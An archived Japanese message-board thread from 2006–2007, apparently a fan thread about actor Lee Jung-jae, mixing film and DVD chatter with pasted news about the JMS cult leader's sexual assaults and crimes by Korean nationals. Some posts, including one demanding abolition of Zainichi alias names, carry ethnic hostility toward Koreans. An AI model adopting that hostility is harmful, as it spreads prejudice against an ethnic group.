韓国カルト、日本で2千人 若者勧誘、教祖が性的暴行  2006年07月28日
http://www.asahi.com/national/update/0727/OSK200607270231.html

首都圏や関西で、大学生ら20代の若者が、韓国人男性=海外逃亡中=の教祖に
絶対服従を誓う新興宗教集団(カルト)に引き込まれ、マンションの一室で共同生活を
送ったり、信者同士の合同結婚式に参加させられたりしていることがわかった。
集団には、約2000人が登録されているとみられ、少しずつ勢力を拡大している。
教祖の女性信者に対する性的暴行も常態化しており、これまでに100人を超す学生らが
被害に遭ったとされる。脱会支援を進める日本基督教団や弁護士らには、
「子どもを取り返したい」という親らの相談が200件以上、寄せられている。

 この集団は、キリスト教の聖書を独自に解釈する教義を掲げ、韓国で80年ごろ設立された。
当初は「モーニングスター(MS)」、現在は「摂理」と呼ばれている。教祖の鄭明析
(チョン・ミョンソク)氏(61)は、女性信者への性的暴行が韓国で社会問題化した99年、
国外に脱出。ソウル地検などから強姦(ごうかん)容疑で指名手配され、
国際刑事警察機構(ICPO)を通じて国際手配されたが、逃亡を続けている。

 集団の内部資料などによると、日本側の信者は、全国の国立大学や有名私立大学の
学生や卒業生がほとんど。女性が約6割を占める。東京、大阪、名古屋、福岡、札幌など
40カ所前後に「教会」と呼ぶ拠点がある。集合住宅の一室の場合が多く、
一部の信者はここで数人単位の共同生活を送っている。

団内では、男女交際が禁止され、信者同士による合同結婚式が年1回のペースで開かれている。
毎月、一定額の献金が課せられ、一部が教祖の逃亡資金として使われている疑いがある。

脱会者らの証言によると、鄭教祖は、国際手配を受ける前の02年までは頻繁に来日していた。
大阪や千葉の側近信者の自宅に滞在。数人から10人前後の女子学生らを連日のように招き、
「健康チェックをする」などと称し、わいせつ行為や乱暴を繰り返したとされる。

                     以下略


163 :魅せられた名無しさん:2006/08/01(火) 03:58:41
黒水仙のDVD特別版の映像特典83分あるのに本編と一緒に2層1面に収録だって

164 :魅せられた名無しさん:2006/08/01(火) 04:07:18
ワーナーのサイトに出たから再販かと思ったけど前のままだった・・・スマン

165 :魅せられた名無しさん:2006/08/03(木) 18:54:59
あの特典映像って釜山映画祭での舞台挨拶とインタビューだよね。
あとメイキングがあるだけ。


166 :魅せられた名無しさん:2006/08/05(土) 16:52:36
大鐘賞、ジョンジェはプレゼンターでも出たんだね。
パートナーのキム・アジュンを全くスルーして
一人で受賞者を読み上げてたけどそれでいいのか???

167 :魅せられた名無しさん:2006/08/10(木) 18:04:15
ムービープラスで純愛譜のメイキングやってた〜

168 :魅せられた名無しさん:2006/08/13(日) 22:32:21
メイキングよかったですか?
今からムービープラスに加入しようか思案中。

169 :魅せられた名無しさん:2006/08/16(水) 02:25:48
勝手にしろバカw

170 :魅せられた名無しさん:2006/08/19(土) 23:51:42
m9(^Д^)プギャー

171 :魅せられた名無しさん:2006/08/20(日) 03:43:15
純愛譜の撮影中、ジョンジェアラスカの空港でとんでもない事したんだねぇ〜

172 :魅せられた名無しさん:2006/08/20(日) 04:52:18
床に脱糞とか?
西瓜みちゃったらソレくらいやりかねん

173 :魅せられた名無しさん:2006/08/23(水) 00:37:34
脱糞。。。

174 :魅せられた名無しさん:2006/08/24(木) 19:08:07
あれ、火災報知器押したってレスが入ってなかったっけ
見間違い?

175 :魅せられた名無しさん:2006/08/26(土) 17:48:50
イ・ジョンジェ


176 :魅せられた名無しさん:2006/08/26(土) 17:55:18
ビシバシステム

177 :魅せられた名無しさん:2006/08/27(日) 12:46:10
キアヌのイルマーレが9/23公開だから
宣伝のためテレビで放映やらないかな?

178 :魅せられた名無しさん:2006/08/27(日) 21:12:51
イ・ジョンジェとチョン・ジヒョンだから良い映画だった。
ハリウッド製のイルマーレや猟奇的な彼女は見たくない…。

179 :魅せられた名無しさん:2006/08/29(火) 08:36:53
でもキアヌは好きだから少し期待してるw

180 :魅せられた名無しさん:2006/08/29(火) 23:11:49
>>178みたいな、感性の硬直した人にはなりたくないね。

181 :魅せられた名無しさん:2006/08/29(火) 23:15:52
人それぞれだからね
イルマーレとレイクハウスは別の作品として楽しむよ
キアヌはイルマーレを観たのかな

182 :魅せられた名無しさん:2006/08/30(水) 02:59:29
http://www.youtube.com/watch?v=vUc4LuU2kOY

183 :魅せられた名無しさん:2006/09/08(金) 11:17:22
イルマーレ公開にあわせてオリジナル版地上波があるかと期待してたが
まだどこからも聞かないね・・・

184 :魅せられた名無しさん:2006/09/08(金) 12:54:25
韓国では初週7位くらいだね米版イルマーレ

185 :魅せられた名無しさん:2006/09/08(金) 21:13:01
台風DVDキター

186 :魅せられた名無しさん:2006/09/23(土) 07:30:56
『イルマーレ』渋谷シネパレスで9/30からやりますよ。

187 :魅せられた名無しさん:2006/10/04(水) 13:38:16
>>183
先ほど、ムービープラスで見ました

188 :魅せられた名無しさん:2006/10/14(土) 16:24:05
★連続暴行の男を再逮捕=女性宅侵入、現金も奪う−大阪府警
大阪市の女性が旅行用バッグに入れられ拉致されるなどした連続婦女暴行事件で、
大阪府警捜査一課などは13日、別の女性宅に侵入し乱暴したとして、強盗強姦(ごうかん)
などの疑いで、韓国籍の無職金平和容疑者(42)=同罪などで起訴=を再逮捕した。
容疑を認めている。同容疑者の逮捕は3回目。
調べでは、金容疑者は5月20日未明、神戸市の当時22歳の女性宅に侵入、スタンガンなど
で脅して乱暴し、現金約10万円やネックレスを奪った上、女性のキャッシュカードで銀行から
計約208万円を引き出した疑い。
時事通信 2006/10/13-19:13
ttp://www.jiji.com/jc/c?g=soc_30&k=2006101300966


189 :魅せられた名無しさん:2006/10/18(水) 18:30:34
ドラマ出演ケテーイ?

190 :魅せられた名無しさん:2006/10/28(土) 18:53:11
そろそろ次回作が見たいっす

191 :魅せられた名無しさん:2006/11/11(土) 01:03:37
何してます?にうすが無いなぁ

192 :魅せられた名無しさん:2006/11/11(土) 18:37:01
林檎?

193 :魅せられた名無しさん:2006/11/15(水) 10:19:17
ドラマはどうなったの?
最近本当にニュースがない

194 :魅せられた名無しさん:2006/11/21(火) 13:53:40
同居女性の「整形手術代」を恐喝 アダルトグッズ販売の男逮捕

インターネットで知り合い自宅に同居させていた女子大学生(21)から現金を脅し取ったとして、
大阪府警生野署は21日までに、恐喝容疑で大阪市生野区、アダルトグッズ販売業、
南成信容疑者(34)の逮捕状を取った。同日午後にも再逮捕する。
調べでは南容疑者は平成16年ごろ、女子学生に「整形手術する」などと父親にうそをつかせて
約2000万円を振り込ませ、うち百数十万円を脅し取った疑いが持たれている。
任意聴取に容疑を否認しているという。
女子学生は高校3年だった14年8月に南容疑者と知り合い、15年6月から約2年間同居。
父親は家出人捜索願を出す一方、南容疑者の自宅を割り出し訪ねたが女子学生は帰宅を拒んだという。
生野署は監禁の疑いでも調べていた。
南容疑者は昨年8月、自分の店の従業員にけがをさせたとして逮捕され、女子学生は家に戻った。
今は大学をやめているという。

(11/21 12:03)
ttp://www.sankei.co.jp/news/061121/sha011.htm

195 :魅せられた名無しさん:2006/11/24(金) 20:34:02
22日、羽田で一般人みたいにフツーにカートを引っ張っていたらしいけど
まだ日本にいるのかな?

196 :魅せられた名無しさん:2006/11/25(土) 01:41:01
プライベートで来日?

197 :魅せられた名無しさん:2006/11/25(土) 03:34:26
まさか半島に出でよで下ぶくれと顔合わせとか?

198 :魅せられた名無しさん:2006/11/25(土) 19:20:52
http://up.meiwasuisan.com/up2/src/msu_0033.gif

199 :魅せられた名無しさん:2006/12/23(土) 00:22:20
在日の通名を廃止せよ
ttp://www.policejapan.com/contents/syakai/20061219/index.html


200 :魅せられた名無しさん:2007/01/11(木) 08:15:32
韓国ドラマ・韓国映画などの情報交換しませんか?
【蒸すのはどっち?】アンドレPart.275【シューマイor頭皮】
http://ex13.2ch.net/test/read.cgi/wall/1168194840/

201 :魅せられた名無しさん:2007/01/12(金) 10:55:44
【今日気づいた】アンドレPart.276【心のささえ】
http://ex13.2ch.net/test/read.cgi/wall/1168454691/

202 :魅せられた名無しさん:2007/02/06(火) 04:29:32
過疎

203 :魅せられた名無しさん:2007/02/06(火) 10:52:38
事務所と訴訟騒ぎになってるのに何もカキコ無し…
ヲタ消滅か?それともAに居ないだけ?

204 :魅せられた名無しさん:2007/02/06(火) 15:04:53
Aにいないんだと思うよ

205 :魅せられた名無しさん:2007/02/07(水) 12:50:30
雑でジョンジョとか騒いでるのはヲタじゃないのか?

206 :魅せられた名無しさん:2007/02/07(水) 13:12:15
3番手4番手の贔屓だと思う

207 :魅せられた名無しさん:2007/02/07(水) 15:58:31
ノシ
以前は2番手でしたが最近は6番手くらいになっちゃいました

208 :魅せられた名無しさん:2007/02/08(木) 12:30:08
>>207
いったい何人いるんだよw


209 :魅せられた名無しさん:2007/02/22(木) 20:41:45
エアシティに日本先行投資ってことは日本での放送は確実だね

40 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)